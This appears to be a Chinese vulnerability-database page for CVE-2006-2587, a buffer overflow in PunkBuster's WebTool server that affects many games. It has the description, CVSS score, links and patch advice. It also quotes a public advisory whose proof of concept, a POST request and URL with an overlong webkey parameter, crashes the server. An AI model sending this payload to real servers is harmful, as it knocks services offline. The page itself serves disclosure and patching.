CVE-2006-2587
CVSS5.0
发布时间 :2006-05-25 06:02:00
修订时间 :2011-03-07 21:36:33
NMCOE    

[原文]Buffer overflow in the WebTool HTTP server component in (1) PunkBuster before 1.229, as used by multiple products including (2) America's Army 1.228 and earlier, (3) Battlefield 1942 1.158 and earlier, (4) Battlefield 2 1.184 and earlier, (5) Battlefield Vietnam 1.150 and earlier, (6) Call of Duty 1.173 and earlier, (7) Call of Duty 2 1.108 and earlier, (8) DOOM 3 1.159 and earlier, (9) Enemy Territory 1.167 and earlier, (10) Far Cry 1.150 and earlier, (11) F.E.A.R. 1.093 and earlier, (12) Joint Operations 1.187 and earlier, (13) Quake III Arena 1.150 and earlier, (14) Quake 4 1.181 and earlier, (15) Rainbow Six 3: Raven Shield 1.169 and earlier, (16) Rainbow Six 4: Lockdown 1.093 and earlier, (17) Return to Castle Wolfenstein 1.175 and earlier, and (18) Soldier of Fortune II 1.183 and earlier allows remote attackers to cause a denial of service (application crash) via a long webkey parameter.


[CNNVD]PunkBuster WebTool HTTP服务器组件 远程缓冲区溢出漏洞(CNNVD-200605-476)

        (1) PunkBuster 1.229 之前版本中的WebTool HTTP服务器组件 (2) America's Army 1.228 及之前版本, (3) Battlefield 1942 1.158及之前版本, (4) Battlefield 2 1.184及之前版本, (5) Battlefield Vietnam 1.150及之前版本, (6) Call of Duty 1.173及之前版本, (7) Call of Duty 2 1.108及之前版本, (8) DOOM 3 1.159及之前版本, (9) Enemy Territory 1.167及之前版本, (10) Far Cry 1.150及之前版本, (11) F.E.A.R. 1.093及之前版本, (12) Joint Operations 1.187及之前版本, (13) Quake III Arena 1.150及之前版本, (14) Quake 4 1.181及之前版本, (15) Rainbow Six 3: Raven Shield 1.169及之前版本, (16) Rainbow Six 4: Lockdown 1.093及之前版本, (17) Return to Castle Wolfenstein 1.175及之前版本, 以及(18) Soldier of Fortune II 1.183及之前版本,远程攻击者借助一个长webkey参数,引起拒绝服务(应用程序崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2587
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2587
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-476
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/20257
(VENDOR_ADVISORY)  SECUNIA  20257
http://xforce.iss.net/xforce/xfdb/26608
(UNKNOWN)  XF  punkbuster-webtool-bo(26608)
http://www.vupen.com/english/advisories/2006/1940
(UNKNOWN)  VUPEN  ADV-2006-1940
http://www.securityfocus.com/bid/18106
(UNKNOWN)  BID  18106
http://www.securityfocus.com/archive/1/archive/1/434909/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060523 Buffer-overflow in the WebTool service of PunkBuster for servers (minor than v1.229)
http://www.evenbalance.com/index.php?page=support-all.php
(UNKNOWN)  CONFIRM  http://www.evenbalance.com/index.php?page=support-all.php
http://securitytracker.com/id?1016155
(UNKNOWN)  SECTRACK  1016155
http://aluigi.altervista.org/adv/pbwebbof-adv.txt
(VENDOR_ADVISORY)  MISC  http://aluigi.altervista.org/adv/pbwebbof-adv.txt
http://www.osvdb.org/25738
(UNKNOWN)  OSVDB  25738
http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0607.html
(UNKNOWN)  FULLDISC  20060523 Buffer-overflow in the WebTool service of PunkBuster for servers (minor than v1.229)

- 漏洞信息

PunkBuster WebTool HTTP服务器组件 远程缓冲区溢出漏洞
中危 缓冲区溢出
2006-05-25 00:00:00 2006-09-25 00:00:00
远程  
        (1) PunkBuster 1.229 之前版本中的WebTool HTTP服务器组件 (2) America's Army 1.228 及之前版本, (3) Battlefield 1942 1.158及之前版本, (4) Battlefield 2 1.184及之前版本, (5) Battlefield Vietnam 1.150及之前版本, (6) Call of Duty 1.173及之前版本, (7) Call of Duty 2 1.108及之前版本, (8) DOOM 3 1.159及之前版本, (9) Enemy Territory 1.167及之前版本, (10) Far Cry 1.150及之前版本, (11) F.E.A.R. 1.093及之前版本, (12) Joint Operations 1.187及之前版本, (13) Quake III Arena 1.150及之前版本, (14) Quake 4 1.181及之前版本, (15) Rainbow Six 3: Raven Shield 1.169及之前版本, (16) Rainbow Six 4: Lockdown 1.093及之前版本, (17) Return to Castle Wolfenstein 1.175及之前版本, 以及(18) Soldier of Fortune II 1.183及之前版本,远程攻击者借助一个长webkey参数,引起拒绝服务(应用程序崩溃)。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        PunkBuster PunkBuster 1.228
        PunkBuster PunkBuster 1.229
        http://www.punkbuster.com/
        PunkBuster PunkBuster 0.987
        PunkBuster PunkBuster 1.229
        http://www.punkbuster.com/
        PunkBuster PunkBuster 1.180
        PunkBuster PunkBuster 1.229
        http://www.punkbuster.com/

- 漏洞信息 (1819)

PunkBuster < 1.229 (WebTool Service) Remote Buffer Overflow DoS (EDBID:1819)
multiple dos
2006-05-23 Verified
0 Luigi Auriemma
N/A [点击下载]
Luigi Auriemma

##############################################################################

Application:  PunkBuster
              http://www.punkbuster.com
Versions:     PunkBuster for servers, versions minor than v1.229:
                America's Army                  <= v1.228
                Battlefield 1942                <= v1.158
                Battlefield 2                   <= v1.184
                Battlefield Vietnam             <= v1.150
                Call of Duty                    <= v1.173
                Call of Duty 2                  <= v1.108
                DOOM 3                          <= v1.159
                Enemy Territory                 <= v1.167
                Far Cry                         <= v1.150
                F.E.A.R.                        <= v1.093
                Joint Operations                <= v1.187
                Quake III Arena                 <= v1.150
                Quake 4                         <= v1.181
                Rainbow Six 3: Raven Shield     <= v1.169
                Rainbow Six 4: Lockdown         <= v1.093
                Return to Castle Wolfenstein    <= v1.175
                Soldier of Fortune II           <= v1.183
Platforms:    Win32, Linux and Mac
Bug:          buffer overflow in the built-in web server for the remote
              server's administration (WebTool)
Exploitation: remote, versus server
Date:         23 May 2006
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

##############################################################################

This web server is not enabled by default but must be activated
selecting the TCP port on which running the service using the command:
pb_sv_httpport PORT

The authentication mechanism is handled through a parameter called
webkey followed by the password and sent by the client using the POST
method or directly in the URL.

A webkey longer than 1024 bytes exploits a buffer-overflow which
happens when the program uses the memcpy function for copying the
attacker string in a limited buffer used for the comparison with the
valid service's password.

The following is the code from the pbsv.dll 1.183 of the game Soldier
of Fortune II where happens the exception which interrupts the game:

...
0511B3A8   8BB424 58100000  MOV ESI,DWORD PTR SS:[ESP+1058]
0511B3AF   8D4424 18        LEA EAX,DWORD PTR SS:[ESP+18]
0511B3B3   6A 41            PUSH 41
0511B3B5   50               PUSH EAX
0511B3B6   C68424 55100000 >MOV BYTE PTR SS:[ESP+1055],0
0511B3BE   FF96 54010000    CALL DWORD PTR DS:[ESI+154]
0511B3C4   8BBC24 64100000  MOV EDI,DWORD PTR SS:[ESP+1064]
...

The ESI register is controlled by the attacker.
The memcpy function described above instead is located at offset
0512aea7.

##############################################################################

Send the following text file to the port on which is running PunkBuster

POST /pbsvweb HTTP/1.1

webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccddddeeeeffff
cmds=Command Screen

or simply build and use a link like the following:

 http://127.0.0.1:80/pbsvweb/plist=1&webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccddddeeeeffff

# milw0rm.com [2006-05-23]
		

- 漏洞信息

25738
PunkBuster WebTool webkey Authentication Overflow
Remote / Network Access Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A remote overflow exists in Punkbuster for Servers WebTool. The software fails to properly validate user-supplied input via the 'webkey' parameter, resulting in a buffer overflow. With a specially crafted URL, an attacker can crash the server and potentially run arbitrary code, resulting in a loss of availability and/or integrity.

- 时间线

2006-05-23 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.229 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站